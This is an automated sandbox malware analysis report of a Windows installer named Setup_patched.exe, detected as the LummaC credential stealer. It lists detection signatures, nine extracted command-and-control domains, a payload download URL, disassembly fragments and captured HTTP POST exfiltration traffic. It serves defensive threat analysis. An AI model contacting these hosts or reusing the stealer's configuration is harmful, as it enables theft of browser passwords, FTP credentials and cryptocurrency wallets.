Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup_patched.exe

Overview

General Information

Sample name:Setup_patched.exe
Analysis ID:1664107
MD5:b4e8bdda146b28cb226f3b1a77dbc7ec
SHA1:52e88530567fc1154be2c11fea15018bb24e6824
SHA256:0291228d9e8db56848514b2029803999ed513d8b549c2cc60a748d03ca39df55
Tags:de-pumpedexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • Setup_patched.exe (PID: 7836 cmdline: "C:\Users\user\Desktop\Setup_patched.exe" MD5: B4E8BDDA146B28CB226F3B1A77DBC7EC)
  • cleanup
{"C2 url": ["jesxterplay.run/tuyhd", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "637b55279021aab33278188cfa638397"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.1586693990.0000000003656000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
      00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        Process Memory Space: Setup_patched.exe PID: 7836JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Setup_patched.exe PID: 7836JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-13T17:04:55.287739+020020283713Unknown Traffic192.168.2.54970389.169.54.153443TCP
            2025-04-13T17:05:16.627058+020020283713Unknown Traffic192.168.2.549692104.21.80.1443TCP
            2025-04-13T17:05:19.882870+020020283713Unknown Traffic192.168.2.549694104.21.80.1443TCP
            2025-04-13T17:05:21.701529+020020283713Unknown Traffic192.168.2.549697104.21.80.1443TCP
            2025-04-13T17:05:24.042700+020020283713Unknown Traffic192.168.2.549698104.21.80.1443TCP
            2025-04-13T17:05:28.598364+020020283713Unknown Traffic192.168.2.549699104.21.80.1443TCP
            2025-04-13T17:05:29.956435+020020283713Unknown Traffic192.168.2.549700104.21.80.1443TCP
            2025-04-13T17:05:31.688199+020020283713Unknown Traffic192.168.2.549701104.21.80.1443TCP
            2025-04-13T17:05:33.613012+020020283713Unknown Traffic192.168.2.549702104.21.80.1443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://h1.mockupeastcoast.shop/Avira URL Cloud: Label: malware
            Source: https://h1.mockupeastcoast.shop/shark.binhAvira URL Cloud: Label: malware
            Source: https://h1.mockupeastcoast.shop/n(Avira URL Cloud: Label: malware
            Source: https://h1.mockupeastcoast.shop/01Avira URL Cloud: Label: malware
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["jesxterplay.run/tuyhd", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "637b55279021aab33278188cfa638397"}
            Source: Setup_patched.exeVirustotal: Detection: 6%Perma Link
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: jesxterplay.run/tuyhd
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: jawdedmirror.run/ewqd
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: changeaie.top/geps
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: lonfgshadow.live/xawi
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: liftally.top/xasj
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: nighetwhisper.top/lekd
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: salaccgfa.top/gsooz
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: zestmodp.top/zeda
            Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmpString decryptor: owlflright.digital/qopy
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AF3B1 CryptUnprotectData,3_3_029AF3B1
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AA19B CryptUnprotectData,3_3_029AA19B
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AF68D CryptUnprotectData,3_3_029AF68D
            Source: Setup_patched.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49694 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49697 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49698 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49702 version: TLS 1.2
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then lea edx, dword ptr [ecx+eax]3_3_029BFAE0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]3_3_029A9080
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7229661Dh3_3_029E00B0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]3_3_029E08D0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2AF18DF6h]3_3_029D4680
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then add ecx, eax3_3_029D4680
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then lea edx, dword ptr [eax-10h]3_3_029A1748
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov eax, edx3_3_029DEF70
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]3_3_029DFCB0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]3_3_029DFCB0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]3_3_029B05B0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], D397AED6h3_3_029B05B0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_3_0299B2B0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov ecx, esi3_3_029ABAAF
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]3_3_0299CAC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]3_3_029E0AC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 91942B0Dh3_3_029AAA0B
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h3_3_029B9230
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-0154764Eh]3_3_029DD250
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov word ptr [eax], cx3_3_029B2270
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+26025E6Bh]3_3_029AA3A3
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+20h]3_3_029D9BD0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov dword ptr [esp+14h], eax3_3_0299F3F6
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-21043798h]3_3_029BEBE0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-755ACB0Ah]3_3_029B7B20
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000000D8h]3_3_029A0B40
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+60h]3_3_029BF080
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+00h]3_3_0299A8C0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then jmp eax3_3_029C08F5
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]3_3_029B2E12
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+679F28F4h]3_3_029DA810
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]3_3_029B3815
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]3_3_029DF850
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax]3_3_029DF850
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov dword ptr [esp+04h], eax3_3_029C0199
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then add edx, FFFFFFFEh3_3_029D5910
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then cmp word ptr [edi+ecx], 0000h3_3_029B2969
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then push 00000020h3_3_029AD16C
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_3_02999EC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_3_02999EC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]3_3_029B2E12
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]3_3_029DC620
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+34h]3_3_029AAE42
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-6D8E8D46h]3_3_029A0789
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], FDD2FF0Ch3_3_029D87F0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-48B40644h]3_3_029B4965
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-48B40644h]3_3_029B4F4C
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ecx, word ptr [ebx+eax]3_3_029B3C80
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov dword ptr [esp+04h], ecx3_3_029B3C80
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then cmp word ptr [eax+ecx], 0000h3_3_029ADCB8
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+679F28F4h]3_3_029D94F0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_3_029C3DB0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax+00h]3_3_02991DE0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+78h]3_3_029AFD50
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 4x nop then mov edx, 00000001h3_3_029B3565

            Networking

            barindex
            Source: Malware configuration extractorURLs: jesxterplay.run/tuyhd
            Source: Malware configuration extractorURLs: jawdedmirror.run/ewqd
            Source: Malware configuration extractorURLs: changeaie.top/geps
            Source: Malware configuration extractorURLs: lonfgshadow.live/xawi
            Source: Malware configuration extractorURLs: liftally.top/xasj
            Source: Malware configuration extractorURLs: nighetwhisper.top/lekd
            Source: Malware configuration extractorURLs: salaccgfa.top/gsooz
            Source: Malware configuration extractorURLs: zestmodp.top/zeda
            Source: Malware configuration extractorURLs: owlflright.digital/qopy
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49692 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49697 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49694 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 89.169.54.153:443
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 81Host: jesxterplay.run
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1j523GbbQK5IvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14896Host: jesxterplay.run
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=fOrMK1j22vGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15035Host: jesxterplay.run
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=bhOx66UKCjW2db53jjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20559Host: jesxterplay.run
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=j1UMtlvtEYW57USv6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 7115Host: jesxterplay.run
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=83O86pv2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2548Host: jesxterplay.run
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Mj244OSjh0hAEb6CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 589388Host: jesxterplay.run
            Source: global trafficHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 119Host: jesxterplay.run
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: jesxterplay.run
            Source: global trafficDNS traffic detected: DNS query: h1.mockupeastcoast.shop
            Source: unknownHTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 81Host: jesxterplay.run
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Setup_patched.exeString found in binary or memory: http://www.innosetup.com/
            Source: Setup_patched.exeString found in binary or memory: http://www.remobjects.com/ps
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Setup_patched.exe, 00000003.00000003.1499126568.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: Setup_patched.exe, 00000003.00000003.1624426120.000000000075D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.sh
            Source: Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/
            Source: Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/01
            Source: Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/n(
            Source: Setup_patched.exe, 00000003.00000003.1624449226.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1624449226.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/shark.bin
            Source: Setup_patched.exe, 00000003.00000003.1624449226.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/shark.binh
            Source: Setup_patched.exe, 00000003.00000003.1452353554.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586096452.0000000000749000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/
            Source: Setup_patched.exe, 00000003.00000003.1522009372.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/22vGxB
            Source: Setup_patched.exe, 00000003.00000003.1522009372.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/5827
            Source: Setup_patched.exe, 00000003.00000003.1499316818.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/HB
            Source: Setup_patched.exe, 00000003.00000003.1571702027.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586096452.0000000000749000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1569856850.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/ad
            Source: Setup_patched.exe, 00000003.00000003.1571702027.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1569856850.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/ad0B
            Source: Setup_patched.exe, 00000003.00000003.1499316818.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/dateclpBS
            Source: Setup_patched.exe, 00000003.00000003.1586096452.0000000000749000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/os
            Source: Setup_patched.exe, 00000003.00000003.1625123685.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1552770099.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1569856850.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/tuyhd
            Source: Setup_patched.exe, 00000003.00000003.1593315122.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/tuyhd#
            Source: Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/tuyhd=
            Source: Setup_patched.exe, 00000003.00000003.1484493432.000000000358F000.00000004.00000800.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1484810405.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/tuyhdB
            Source: Setup_patched.exe, 00000003.00000003.1499890116.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1522009372.000000000073A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/tuyhdM
            Source: Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/tuyhds
            Source: Setup_patched.exe, 00000003.00000003.1625123685.0000000000749000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run/xB
            Source: Setup_patched.exe, 00000003.00000003.1593315122.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jesxterplay.run:443/tuyhd
            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: Setup_patched.exe, 00000003.00000003.1460081764.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
